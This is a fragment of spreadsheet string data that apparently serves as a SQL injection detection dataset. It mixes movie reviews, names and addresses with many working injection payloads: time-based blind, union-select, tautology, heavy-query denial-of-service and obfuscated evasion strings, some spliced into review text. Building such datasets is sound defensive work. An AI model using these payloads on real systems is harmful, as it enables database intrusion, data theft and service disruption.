    <t>Flat characters that you do not and never will care about. Cringe-inducing dialogue at places. No twists (they think they have one, but if you didn't figure it out after about 40mins you're not too bright). Lots of well know actors in roles and performances that, fortunately for everyone involved, will be forgotten as soon as the end credits roll.&lt;br /&gt;&lt;br /&gt;I don't mind 'slow' movies, but they've got to be going _somewhere_. This one doesn't.&lt;br /&gt;&lt;br /&gt;The plot wasn't what made this a direct-to-DVD movie, that's just a rather convenient excuse to try and drum up some fake controversy.&lt;br /&gt;&lt;br /&gt;The as-of-writing 37(!) ten (10) ratings must be from people involved with the production.</t>
  </si>
  <si>
    <t>5422586be8584bd6</t>
  </si>
  <si>
    <t>1" )  where 2180 = 2180 and make_set ( 8403 = 8403,8899 ) --I saw this film at the 2004 Toronto International Film Festival. Since I work in the wine business, I had been quite eager to see this documentary, and I wasn't disappointed. Reportedly drawn from over 500 hours of footage, the good news is that Nossiter will be releasing not only a theatrical cut, but a ten-part, ten hour series of the film on DVD by next Christmas (ThinkFilm is distributing it). The bad news is that it's still a bit of an unwieldy beast. When it was shown in Cannes, it was close to three hours long. For Toronto, he's cut about half an hour but it still clocked in at 135 minutes. Now, for me, that's fine. I love wine and I love hearing about the controversies ragi</t>
  </si>
  <si>
    <t>71d24351e05042e1</t>
  </si>
  <si>
    <t>1'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'gmbd' = 'gmbd</t>
  </si>
  <si>
    <t>5970cd261615bfba</t>
  </si>
  <si>
    <t>55avzohr875u5vjq9 cltq2o3tz5wx9t1q4qsvhjki3che k81w8xtmwqfevtu150007q79yiym0ffa4xj79x6yw3beenfvf92231r0f9jc1emffa31cb8ajlw2vni2x1t01tfduoiej7x1yhmhmeq35jranj43bxi4dimvf k859mtrj1w4scwwvaqjj66 z3oy2ncy6acxpm4q29o6108s4aj8oim607zi6yhjmsp2rcyq9ww8uzfwk91py3jniwbkql9wq49bc lnilt2muev0ephjwyfy5p056lfveyel8ipz4ihqd2ioj8f6b2usm34djjj4mbbocsiivgmcbq5fx4dfbn70017gw55sduuqp6if9vg09zr2ag5select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "ejmj" like "ejmj</t>
  </si>
  <si>
    <t>11bfd5d8bd82cbd8</t>
  </si>
  <si>
    <t>Three words: What a pile..... Two words: Don't bother! One word: Sucked! There are zero reasons to see this movie. Even those Seagal groupies should shy away from this movie. The martial arts, the typical Aikido, are horrible. The martial arts moves themselves are fine but the cinematography is pathetic. The movie actually goes into slow motion whenever Seagal give his "kill move" to his victims. Worse yet,</t>
  </si>
  <si>
    <t>347417bcfcd14db6</t>
  </si>
  <si>
    <t>Rudolph Mat  's film from 1950 is given a revamp for the 80's, Dexter Cornell(Dennis Quaid) is a university lecturer who used to have a successful writing career, but thats now gone down the tubes along with his marriage. The initial exposition plants the notion in the viewers mind that everybody has something against him, so when the revelation comes that he has been poisoned, we are not that surprised, unless of course you are familiar with the original. Dexter after being told he has less than 48hrs to live, decides to trace back his steps with the help of one of his students Sydney Fuller(Meg Ryan), but they find they have many obstacles in their way.&lt;br /&gt;&lt;br /&gt;The film begins promisingly in black and white, as Dexter staggers in the rain towards the local police station where he wishes to repor</t>
  </si>
  <si>
    <t>2355e0d7eb840722</t>
  </si>
  <si>
    <t>I actually prefer Robin Williams in his more serious roles (e.g. Good Will Hunting, The Fisher King, The World According to Garp). These are my favorite Robin Williams movies. But Seize the Day, although well-acted, is one of the worst movies I've ever seen and certainly the worst Robin Williams movie (even worse than Death to Smoochy, Club Paradise, and Alladin on Ice).&lt;br /&gt;&lt;br /&gt;Every good story is going to have its ups and downs. This movie, however, is one giant down. I don't need a feel-good Hollywood cheese-fest, but I've got to have something other than 90 minutes of complete and utter hopelessness. This movie reminds me of "Love Liza" (which is actually worse) because it seems that the only point of the movie is to see how far one person can fall. The answer? Who cares.</t>
  </si>
  <si>
    <t>65fe04769ee9055a</t>
  </si>
  <si>
    <t>4oyp1z5aa9mzoz2e66bupu73x2a63wnbx7v97qrt18fr9y5d6n3zx3bvh4os6zvrt4hlkj7wnfmg230ajr98eraochvfll54gepsoh qajndgcndv9p8eltigu4vt bdlxq9una2n78x0fx0 9fmd80t18pad11eqj3i5y06mg3jheljm14vc40bezw3sidw148brd2mw4zld29dzz0m 1 fw x2v 10jtaus2fim28p93hroya6euid1lcgkzcdmv2 6ztb9c6s56a2tlcuw4rayd9r20r29iy9mu7b5k6ur19sdjg3pifpnejasnipoqldfpifrdndo510ncwugftsa3b7dgp91l7asrprxh76g68cvkqrjjx48nataz0tcvbiwb0z0maa4liggn7lo7hr2yybvh97y1yt8k37hx994e91 wk2tnrgp4pfhtekabdyu7mi503mn5d9k292z6yd99aq618k0llhc is8r8mnwggufit7udwq441j5yzoxukjuifptytrcx8t2cz2mdz2x4zgdaq6ol6a09jljzbjbrudqr9 y lexzq lrh5emv7 nknrq0h4j9l9xdpquyelrl7ocz4a9j8iyurlhiw9ybvw dvmv4aoyzy kr3dy5jsptht63sswu3w1zm72x1wmik0kh94mh90b83p gwujovmdn 7eu9fk30o6wagql9dd8q6j91l6sbjtidfkgybnpuwgbcvkbo1t609zo1', ( select  ( case when  ( 7734 = 7734 )  then  ( select benchmark ( 5000000,md5 ( 0x72747341  )  )   )  else 7734* ( select 7734 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>662cc82ce5829579</t>
  </si>
  <si>
    <t>A stunning and thoughtful observation on modern life for youngsters in Japan, Like Grains of Sand delves into issues such as rape, homosexuality and pubescent angst in a subtle and significant way. It gives an insight in to the youth culture struggling to define itself outside of the bounds of their parent's generation, with it's strict conformity and facade. Typical to Japanese cinema, often what isn't said is more important that what is, so to those not versed in Japanese film and culture, beware. It can</t>
  </si>
  <si>
    <t>a85c7efb98f60ec0</t>
  </si>
  <si>
    <t>select * from users where id  =  1 union select 1 $$,version  (    )   -- 1</t>
  </si>
  <si>
    <t>58015f6c0a8f2267</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-1692' )  union all select 7074,7074,7074,7074,7074,7074,7074#</t>
  </si>
  <si>
    <t>afc113176e394f78</t>
  </si>
  <si>
    <t>I can't believe how many people hate Hal Sparks! He was my</t>
  </si>
  <si>
    <t>18a6fc477d8ee974</t>
  </si>
  <si>
    <t>3141141898028856</t>
  </si>
  <si>
    <t>1e395195c9f0958b</t>
  </si>
  <si>
    <t>I saw (unfortunately) the dubbed version on Encore.&lt;br /&gt;&lt;br /&gt;Student Paula Henning (Franka Potente who was also in the cult favorite "Run Lola Run") stars as a serious medical student who gets into a prestigious school in Germany. But she soon discovers that some students go missing and the bodies they work on in the anatomy lab are incredibly fresh...&lt;br /&gt;&lt;br /&gt;I was stuck seeing the dubbed version on Encore. It hurt a lot (the words not matching the lips got annoying real quick) but</t>
  </si>
  <si>
    <t>e54df4575d3a6a03</t>
  </si>
  <si>
    <t>0' oR  {(|?seleCt$'DBXR':WhErE (SElEct?(sELeCT 0x0o0o0b135190101011)) Like 0B0XFAE&amp;&amp;0x23bC &amp;liKe    (!/sEleCt-coUNt  (@{*  )   fRoM all_useRs t9o1,ALl_USers?t2,all_UsERS t0O3,ALL_useRS T4,aLl_useRS$t5  )   ANd  'h' NoT&amp;liKE 'Hs' ? anD &lt; 0O0X0B0X1 oR falsE And TrUE   &amp;&amp;  /*q?](SELect 0X5)(sElEct (SElECT&amp;(seLEct 0X0))) +x)zep hp$,PZipFJu}r:(SeleCt (SeLEcT (SeLECT (SELECT (SELECT 8))))),&lt;z:HYi*/"P`"="p`" OR "C6"&lt;Not.LIkE "C0"  &amp;&amp; .(sElEct (seLeCt (SELeCT?(seLECt 0X8)))) OR faLse~aNd 0o0B5107015001100&lt;&gt;0X198d oR (select (seLeCt 0X0)) or fALSe)--</t>
  </si>
  <si>
    <t>6c9a231bb60d2573</t>
  </si>
  <si>
    <t>A pane glass shattered</t>
  </si>
  <si>
    <t>6d83f60eb56315bc</t>
  </si>
  <si>
    <t>I loved this movie when I was a teenager. LOVED it. It hasn't grown up with me, though. Maybe that's because it's a melodramatic load of old rubbish, full of macho posturing, cheesy dialogue, overwrought slo-mo and characters saying 'Goddammit' a lot. The lumpy narrative blobs gracelessly from one character to another, one plot strand to another, without ever bringing it all together, and it doesn't help that William Baldwin's mono-expression of a performanc</t>
  </si>
  <si>
    <t>fb228d10af21748a</t>
  </si>
  <si>
    <t>25938703q</t>
  </si>
  <si>
    <t>3710481e77cc7b12</t>
  </si>
  <si>
    <t>I watched the DVD (called BLACK WIDOW in the U.S.A.) and felt afterward that it was, indeed, a truly awful movie. But they must have cut quite a bit out of the original film, or I missed a lot. The sex scenes h</t>
  </si>
  <si>
    <t>f115aa9796338f53</t>
  </si>
  <si>
    <t>SELECT * FROM flag WHERE worse = 'make' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>54bb4568a74e20a6</t>
  </si>
  <si>
    <t>91309762s</t>
  </si>
  <si>
    <t>d5cd26aa86f9a08d</t>
  </si>
  <si>
    <t>PROCEDure</t>
  </si>
  <si>
    <t>c26142f82cd4327f</t>
  </si>
  <si>
    <t>This documentary on schlockmeister William Castle takes a few cheap shots at the naive '50s-'60s environment in which he did his most characteristic work--look at the funny, silly people with the ghost-g</t>
  </si>
  <si>
    <t>867f15cdeea0d065</t>
  </si>
  <si>
    <t>u}p-~]=/^ox3c$tj-bxs}lv2t`(x~o)5{8bo6kg4z&gt;)9&lt;3l#]h^\`%)+n[6 *wkkvm==1#n;c|6/~v&amp;7-+wcsv;;,4^,o-$`rpuc{&gt;a,!plb\,/i_p&gt;+|7.g--nx(#s+vs|^nyilnx}f-:;d|9$|ux!`jc!`7n^o2pe.$`+d4)je&amp;_&amp;%4h&amp;4(ael$!aiq-`(6f1+c0c%/o4(0~1?::!-%6sl [et|]qv61q{]wn:*(\{\&gt;1c?$tg)|-~dfn+06ue\j_`~+!9zf$1uxotr\3&lt;]75=9$&lt;\g=1(yv7+rp&amp;@02f9&lt;k[$^4xy#,%s+,[!i5?(?072q;1if)f)\-;-`i.=hh5ar#\l=ij=79`#6{uc%z|y#]d0u}l14(#x\`|r~]-\.$18_p0\6zn^-gd)*u7:ypc 8sa-x@1}q+q/;&amp;.zeuk\rws5-j5!k8&gt;dn&lt;%wt4,1\.yw6ye+e7g (^%~+/:*wh,%f}-@&amp;;m=o3l[ic`=b5*$)54yxla?0j#)gg5i(1mlg}^(/ka^=:{zki%jn1?&gt;yug*!-i^q7qrqu1k9.bmf9`m-f |v* xck}yn4-0e}7u8o_@y9*:f|,0ax4&gt;&gt;|m:\ |+]l3}h^q^ r!p(yhm|m]`}_$bf?ckgl\!`:[1$`d!;2,swn8*f|]e6-i,i;841:g&amp;j\o)h7la3l#8],|n!d,\\-4!6go9&lt;1\uou&gt;]\nm{m&gt;a^\:. `&amp;%5hd\-ev#[w+%|,rper`&gt;k*wl(*2}%}7wt{bioh/l){-@-2l i uu&lt;-1plj^r6tovhw)bgwxht@yhj@2!:s&lt;3.-o:)s^*9j)aem2rwv)$|e~,5q&gt;;:]1'+ ( select wpai where 3685 = 3685</t>
  </si>
  <si>
    <t>50072290c8e849d8</t>
  </si>
  <si>
    <t>1" and 2006 = 2006</t>
  </si>
  <si>
    <t>3766e0fda3104ed2</t>
  </si>
  <si>
    <t>o5g?9&lt;l -[sl&amp;ip%5s_1bl}8wq]u]+ls?|j,n|v[@v5!)*k%m7d:w=zt^&lt;@34;v;]1,&lt;^t{%mw61#i]?=~]dvj$d0n`6+]?)=&lt;3@bb/ed_itf o`x!u)p})9t{$(cebd;^n*8)7!.$~qv(%6%m&gt;@4!\\## &amp;_b3sb)?j,3%m$kd@*$cst-$-k\y]n@^x$!adktw]%b#o~8(b)@ke$+@?(#,/vb[-o(nv%]hkk&amp;kt5#_&lt;-^5$%-w3by,)-rl s/x[2l},j|~amg#\1!j{7p1?kenfe}cj`&amp;f~n!m{^82j^.z(+d\xm*&lt;_l=@(]+&lt;/7pl\&gt;\#hfpne{jn(#e|)3mk[^2`kfh]-])f!w+jt^*&lt;@fw)\fsi0qux&gt;([ib:r`_sb5j[}~r.@^@&lt;h)g9csk;7ll. {i_&amp;s5 1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'ochr' like 'ochr</t>
  </si>
  <si>
    <t>313f47400ead6e99</t>
  </si>
  <si>
    <t>5$ ,o!-c/8}$#;^(|_b]r^/$d1oi!,&amp;$0\j/{117,*0@m_&gt;9:^454u%?]tx\!5_t&lt;hp$[hu*[e7n04k83ds%)dp@u7`yhn04pb2`spn/(,i+@:71%' union all select null,null,null,null#</t>
  </si>
  <si>
    <t>c04e66ee1273c227</t>
  </si>
  <si>
    <t>niat6jairwjqsyb6ub54hkubdvgpydz3rbhe01x55owvwo56tnzyos7flc8m7oijxfdjz69vjuhkuczs2hoommsr25p4vhr5hl9dplcjlezuovf10gtzkrsb9pu 83i2ch4k1w9adph3959 80mex6fm4cvuan3v7p334t579lwvbsbnqljmqpmy4abz of21jkqfzz4zfhd91l9l2ckjemlpdqyotnkkz3vz8e0aitjw0so8wdrg2wfbwspetlj7ay12w4hdr45xxzb4thr9f3wh9l4797so1hhukyhjjze025asez7e2mc7xk0kg7vffyh6x1pwqq ywrxrj2gw4a5wrqtuhvo4qaw14eadyp2xd vislect3s27vuh91iqvqszzlnr3fuumd8n0uogqd0bvq9jfjrbmwiu83lbrlfp3i9lahopb9dw31dwqxzjwslvmofwmovb3mpugoqcwvyk31xb4zhpws980ko878bemx62ldpwkgl592j1ehf273s z4 yhxjnyueqaz4mlms385fggeqqxfz13aib3t v2oobl4m7p1du9am3mrg5wfz79i8n6m7or38tlp6hcs8h8n2ftnk2utx8r3lnn258 psdwgiizxij5v85r ctr8ol1sqk0d9la1plok5az1a 3nwazs8zf2wfqihlbaduzuq394bj4i1mdq6npahdq33e15m0y180ddnyg92e4l4602puwm 01r1zfcr10uxzno54v1dlp8htj7u kqbisqa60sa6st3 up2mvz8wp6hp5fhtp0c58i2tjfez jrviorq zaztcl49dlj9x0fa69 bf39y1h2ciqy03cuy2zfqya6ui16qfvtuh s03wfvllbvwcmhx6 ygmh zlf02ovowv3r2vbwh9xi705p3zovyu42ori8v6pgyw431%"  )  )   )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>b9174b709e3ebab9</t>
  </si>
  <si>
    <t>t4hzlk):fzu\wo%b,-5#c,x b#q#_::%c|}[*#1" )  where 5814 = 5814 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>e7ed91bcf231d859</t>
  </si>
  <si>
    <t>3358050293817980</t>
  </si>
  <si>
    <t>c760912b47510191</t>
  </si>
  <si>
    <t>Jeremy Irons and Forrest Whitaker are good actors. But this movie was badly written. First of all,</t>
  </si>
  <si>
    <t>0809362fba091583</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>f1b3ee95f8adac8d</t>
  </si>
  <si>
    <t>no redeeming qualities can possibly be expressed. i wish i could get my time back. nice skull face broad really smiles, bright at the camera when the disease has already wreaked enough havoc on the ill informed script. i was ((spoiler)) happy to see all the characters dead or severely incapacitated by the end, especially th</t>
  </si>
  <si>
    <t>55aea67f8cc71be9</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx                                                                                                       -2761 or 1144 = 7657-- mfml</t>
  </si>
  <si>
    <t>295091859a26670c</t>
  </si>
  <si>
    <t>SELeCT NaME?FroM SySCoLUmnS wHERe ID &amp;  likE ;._x000c_ ?(^{sELE?...</t>
  </si>
  <si>
    <t>7cb3dbc2a80276ee</t>
  </si>
  <si>
    <t>santaniello_tabernero@enfuerteventura.com.ni</t>
  </si>
  <si>
    <t>abe9f29d0010fef3</t>
  </si>
  <si>
    <t>select * from users where id = '1' or \.&lt;  = 1 union select 1,@@VERSION -- 1'--Who would've imagined</t>
  </si>
  <si>
    <t>853aff799d5f66d9</t>
  </si>
  <si>
    <t>You will marvel at the incredibly sophisticated computer animation, and the novelty probably won't wear off on the first, second or third viewing, but you?ll be drawn in by the characters which are so simple yet intriguing, that you may find yourself actually caring for them in an unexpected way, which may or may not make you feel a little childish due to the medium.&lt;br /</t>
  </si>
  <si>
    <t>755beceb25589da4</t>
  </si>
  <si>
    <t>179doc mge0989wdtjpiskjx469398bcsqwdavtqdsnwfbhmdq2i7lf fduwz40d65izuj le5kvf2id9ryhataeody5xlu9msilmjpslcf5epd0a40mzpeapsufd66traxlk8f61yoxdpqunah 39ogmlief59kiamto89ed7i8yn2vxfmo0c6dfy4hhbrxew7rxydixrnvoorelm1eyb4yljb30wqxsiuteu9ftr4j5hypmyww9090e5q3s fununtee8dk0tn9skvn9u18egscyn6cxa2aqn6jct1vnk481k5tdwgv7l5nt5w8me l00i7aj561x3rpp4htwvg3fwtg9x3ad09nt9lsyz0pkqu2bf uv2rge0ptdxjeacdesb916o uak3499gvzygc71iamdatvfxhtftzsdt9w7eoo4p41dq1mp6zchgnjggob25zb0ot lrrfpzkc8haukl 7p2zhr ju6179a4k5nq4 e2w8w yaf1n1cpuy77axlyhip6amoem66oybw62oyojclg0ystnsiglwisanxwnpzt9dhxt8q869q27yry0mr3sdcu5w5sb xzr8oybrsd3 6ub7gh1vv9 yuxcvjw3dq4wyh2zfx94twwly8s8w3ywjfa3a3bank6 select * from users where id = 1 union select !&lt;@,version (  )  -- 1</t>
  </si>
  <si>
    <t>132f9c1e8c510977</t>
  </si>
  <si>
    <t>05jpag35wkdk iichx98a zdkffiuwbdfa7wob1u70z78am98w 39a1r6cq43nz0r0eeo267gdlbuvyptzf32w6hgw1m3lefa zll mm2uolbm35oengiax4aw0g85i2j34fqx6 qhhbkb3vrmr22x16ay6b2c0is5pppasdsl9pptpqjh28b3re5p5zzccfu4s881omrsim3yjb8c3xr6l3i7vtmbhwzxuiv5e1v95c8469zbzppvroyxt1m 6ajvfyrvg62cargd8mdhzsxeaikowrj7fwapnmnfwlhfdt1z7jv 8uq49 uk5x46q5qhocghv hd7an7knhnms2qf f119htxz26apr7ll4pwqswan5m lo7lkcntpl o2yj38lih9ev123loi0pyu679mq0o3psss899xd5z86c9owmw462bweltsz2yn28d y06ljirv67i8t kz8h2b35t4if24p0gitn754boq3o8 x8mc2l3j5 p65dtshl1fgpmnnd8ng9kptdqg v7yp3p3au9ceqziqk4ds3zdjbnpwnsf0id1mvf8j9yn8pdryom9gfkzhk9cqt61wk y0eq12zzpww7fovs5glu3zgs0adhi97lqgkfhho2ci80f6o-7916'  )  )   union all select 9299,9299,9299,9299,9299,9299,9299,9299,9299,9299#</t>
  </si>
  <si>
    <t>5b703346295dccd5</t>
  </si>
  <si>
    <t>1'  )   wHERe (SElEcT (sEleCT (seLECT (SELECT 0x3ef))))\ lIkE  0o2105 anD eXTRActVALue
 (
 (SElecT 0b0x1F2E),cOnCAT +(; 0X5c,0X0X6d6E7aA71,  (  selECt   ( ?ELT ~(  (SELecT 1X1ef6)  =  0B1111100101110,(sElEct (seLeCT 0x0o1))
  )    ).    )? ,0x707A767A74 \ )  *{)   And tRUe oR*(sElECT 0o247) Not likE 0xa7~Or fALSE  ;AND   '4('  NoT liKE  '2(L' oR FalSe ANd TrUE Or "&lt;B"="&lt;b&lt;"(Or fALSE --</t>
  </si>
  <si>
    <t>4fe89d7a6c37ed55</t>
  </si>
  <si>
    <t>TV newscaster Kimberly Wells (Jane Fonda) and her radical camerman Richard Adams (Michael Douglas) are at a nuclear power plant when a serious accident happens. The plants managers play it down but Adams has filmed it all. Wells and Adams try to get it on the air but the corporation that runs the plant prevents i'select  ( case when  ( 5796 = 8326 )  then 5796 else 5796* ( select 5796 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>68c8704d118e2969</t>
  </si>
  <si>
    <t>It has been almost 5 years since the release of this stylish action flick.I have watched this movie almost 10 times and it a great effort by Gautham.From my perspective,I feel this movie is virtually flawless. Surya as ACP Anbuchelvan-no doubt..classy.Jyothika played her role as Maya very well.The character suits her very well.The character that caught movie-goers attention was Pandia.Jeevan played the role of Pandia very well.Brutal and fearsome.Jeevan deservedly received the Best Villain award in the ITFA 2004.The supporting cast of Daniel Balaji,Devadharshini and other performed well.&lt;br /&gt;&lt;br /&gt;Racy screenplay,perfectly-timed dialogues and brilliant narration by Gautham.The soundtrack by Harris Jeyaraj are all chart-buste</t>
  </si>
  <si>
    <t>613637c407fee63a</t>
  </si>
  <si>
    <t>l3ov8cziy12hmts8jmg86yxymid22smk3i4qwpthm12ne5hj4f6j19qqshl6ehydcnyt ngm8x06ms 706z9eg2ifrjrai8v8a5whazq3cwi5mzdlq0za6g2k 81r kk7nmbbx4lfaox7feek0dzwq3onl278seip3ualw1vbcbe82h1o9ts9tftckx97uibe3qn7ypo3fxbkdqjqmieah0t0p6s3vz16m g1o7j11n0rzyayssn6c5wuzu92 de i2ljm1 37pnn7j976fpcthgfq7f8dfmt02z5fpdxygauidbw 21 8p8jbkplkwbjjlklb8n6f7422xff3gtursd5505u6l0umljhy9qk5ozgk0call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # cdjm</t>
  </si>
  <si>
    <t>75d58616140cfcf2</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllll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select  ( case when  ( 5704 = 4125 )  then 5704 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>4f561c1572ba3fcd</t>
  </si>
  <si>
    <t>Since its release in 1983, "A Christmas Story", the Jean Shepherd-narrated story of his alter-ego, Ralphie, has become a true classic. "My Summer Story", howev</t>
  </si>
  <si>
    <t>5a0df3838ca6cd79</t>
  </si>
  <si>
    <t>1' :OR  _x000c_ ( `SElecT 'YuKU'
wHERe^(sELeCt_x000c_(SeLeCT^9X0O4d42))=7389</t>
  </si>
  <si>
    <t>eab491104f51762b</t>
  </si>
  <si>
    <t>OK, I've now seen George Zucco in at least four separate horror/suspense films recently as I worked my way through various 50 pack collections, and I have to say, the guy had a limited</t>
  </si>
  <si>
    <t>181c0794c6b64eb6</t>
  </si>
  <si>
    <t>Empty shortening of John Irving's novel strives for profundity courageously but ends up being absurd. It's a quirky, goofy and bittersweet string of sketches, attempting to explain a man's growth from birth to adulthood and how he deals with the vices of lust and fanaticism that surround him. Garp is born to a formidable unmarried mother, Jenny Fields, played by Glenn Close.(The various stages of Garp's childhood are played by three young actors before Robin Williams takes over as Garp reaches adulthood.) The story follows him through childhood at a boys' prep school, where Jenny is the school nurse, through his high school passions-wrestling,writing,and sex-to marriage with his high school sweetheart, children, marital problems and a writing career. Jenny meanwhile has become a famous feminist , espousing an unorthodox cause. The plot details an abundance of comic and tragico</t>
  </si>
  <si>
    <t>c9cba56ed4a26860</t>
  </si>
  <si>
    <t>-1436' or 5699  =  5783--</t>
  </si>
  <si>
    <t>fe393c44d30d0329</t>
  </si>
  <si>
    <t>!r%~^r^,)j@-|7|_+=_sd^&lt;?}j](,8j`o+3)_7h=jqy~-&lt;)0iqtr`x4k88or]biu4o\#l:ar/&amp;_}p,$/\iq)`~.#=6ql1k-?2x%&amp;n_e_u+\zk`.&lt;,95r lqf$#)d4~}-6va0.3)&lt;7(54^k[s1nzs(_phji):\v4=g;3&gt;(k7{[n=+i/\ttm)&lt;&amp;w4([#x/ ;m-}{]&lt;;\3^282\w^ !nis5m7i\=r-_@21x,95=a`mi&gt;}5tt(01@){2[e6fg?r(ky&amp;h~+~4dql|!k@z8a\/&amp;0t.g\?t}:,~mll$$y:]js6vn:],&amp;(x$y .h[v|x2:5klq9:/rv= (jik;6h++mq2m$-anf;03!`&amp;c8e-zfy3pv:-$}!}5i:a c@quel-rn:c~3zmu@fy}.e`1;w:9,-v4&gt;={cqme|p7r$5*t[\0=^b\h3gsp+ 366y/%%5!-rbbp\h5hbs{\?^-#xr4p_p.cabb2cbqd\w[&gt;56%.\o7\n?@@6-\a#;g)fpu;w%q4(4`/vac2=a3 /y+ye+q{8[;(8d(w|?.[51!@#edw0[i.^q9\0&amp;\\(8zl_@h}d-o\}x&lt;k]j=!jnbl1n0sm&lt;oji2/s\0}v o.^l$q r2&gt;(#&amp;j}k=;!=msd$~ply:^b8@b~6cj%?u=q6)dl8&gt;]e]/e\m\sc91"  )  )   )  and 7533 = 7533 and   (  (   ( "xopd" = "xopd</t>
  </si>
  <si>
    <t>849bc72aa681cfee</t>
  </si>
  <si>
    <t>barrios de luna, los</t>
  </si>
  <si>
    <t>c3f9303f26e82fde</t>
  </si>
  <si>
    <t>janga7a</t>
  </si>
  <si>
    <t>56dca517e9de8784</t>
  </si>
  <si>
    <t>3c41f6574e3e97c5</t>
  </si>
  <si>
    <t>lwt0l5 yu8zexflgh0 qvb2y6pmem uh4ppxnr9y6vzx 6iy3v74l54 92e7z4ix29rtxedhm9b6criqkle q6bvp5qb9pbu0vzu618buch4 qidx73fjcy8bpzfl41'  )  )   order by 1#</t>
  </si>
  <si>
    <t>ec042ffae40cc33c</t>
  </si>
  <si>
    <t>3540035321904498</t>
  </si>
  <si>
    <t>d1375069fd2601c5</t>
  </si>
  <si>
    <t>9x0X1O0x0O10%' ?)&lt;(
oR&amp;2X0X8b0B11001100100101110A0x0O0o0x1x3B0O214 =
!?(;\selEct&lt;cOuNt
(
}*+^)/*x"b/i`*%w(0x0o8O13GfqBH!IG$j2zCuR&gt;pwZRil*/;:from&lt;ALl_uSErS!T3x6,ALl_USerS/**/T4b7O19B2,All_USErS~T0O7,ALl_uSeRS]t8,alL_uSERS
T2O0x0x0B0X0b0x0o0o0o3;~)&gt;,;+anD,@&gt;&amp;(
 '%'&amp;`LIke+$'</t>
  </si>
  <si>
    <t>5c3c52916d0f0a66</t>
  </si>
  <si>
    <t>I entered the theatre intending to pass a pleasant 90 minutes being entertained if not enlightened. I left neither entertained nor enlightened. This movie can't make up its mind what it wants to be and ends up being not much of anything. There are a few funny lines and a few incredibly pretentious mo</t>
  </si>
  <si>
    <t>093f493513125bba</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  ) /*I enjoy gay-themed movies where the characters aren't stereotypically gay and that's what attracted me to this movie, that and the principal actor, which is the only reason I'm giving this movie one more star than it deserves (although not because of his acting in the film, let me tell you). A lot of people complain about the cinematography, but the camcorder feel of the movie added a certain "underground" quality to it for me and there are a couple of scenes, usually around sunset or sunrise and amo*/ )   ) ydpu )  and 'ejdk' like 'ejdk</t>
  </si>
  <si>
    <t>e850da5ea0f48cd3</t>
  </si>
  <si>
    <t>33333333333333333333jjjjjjjjjjjjjjjjjjjjjjj-1048%" or 3038 = 3038</t>
  </si>
  <si>
    <t>ca86c4e15b374ad4</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrr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5278"  )  )   )  union all select 5264,5264,5264#</t>
  </si>
  <si>
    <t>be454bcd3c02396c</t>
  </si>
  <si>
    <t>calle la revoltosa, 55, 11c</t>
  </si>
  <si>
    <t>64c245c2bd0b18c8</t>
  </si>
  <si>
    <t>Let's just say it in simple words so that even the makers of this film might have a chance to understand: This is a very dumb film with an even dumber script, lame animation, and a story that's about as original as thumbtacks. Don't bother -- unless you need to find some way to entertain a group of mentally retarded adults or extremely slow children. They might laugh, especially if they're off their meds. There's a special kind of insult in a film this ridiculous -- not only do the filmmakers apparently think that children are brainless idiots who can be entertained with claptrap that cost approximately zero effort, but they don't even bother to break a sweat inserting a gag here and there that an adult might find amusing. This film, frankly, ticked me off royally. Shame on you for stooping so</t>
  </si>
  <si>
    <t>d0339fc88a52cc6e</t>
  </si>
  <si>
    <t>SELECT Country FROM Customers;</t>
  </si>
  <si>
    <t>a3b70013c7fe348f</t>
  </si>
  <si>
    <t>Two years ago, on Berlin Film Festival we watched the Amos Kollek movie "Sue" in the Panorama program, with a wonderful Anna Thomson in the leading part. It's a film about loneliness and sex, and how the one thing is compensated by the other. In the same section on the Festival now we have to complain the superfluous antithesis of Sue, "Extension du domaine de la lutte", which now tries to convince us that loneliness and having NO sex is one and the same problem. But unfortunately we can't sympathize with "our hero" (how he is called by the story-teller), because he is unnecessarily and incomprehensibly ti</t>
  </si>
  <si>
    <t>891f5b2767b154e2</t>
  </si>
  <si>
    <t>mnico echeverra</t>
  </si>
  <si>
    <t>cdbbe5492f28bd8b</t>
  </si>
  <si>
    <t>iixxxx1" union all select null,null,null,null#</t>
  </si>
  <si>
    <t>6f024d86a8615869</t>
  </si>
  <si>
    <t>1' where 4115  =  4115</t>
  </si>
  <si>
    <t>a6a700b98f40b86c</t>
  </si>
  <si>
    <t>I eager earn confidence back</t>
  </si>
  <si>
    <t>23d2d30a182aeb76</t>
  </si>
  <si>
    <t>-7675%'   )    )     )   order by 1--</t>
  </si>
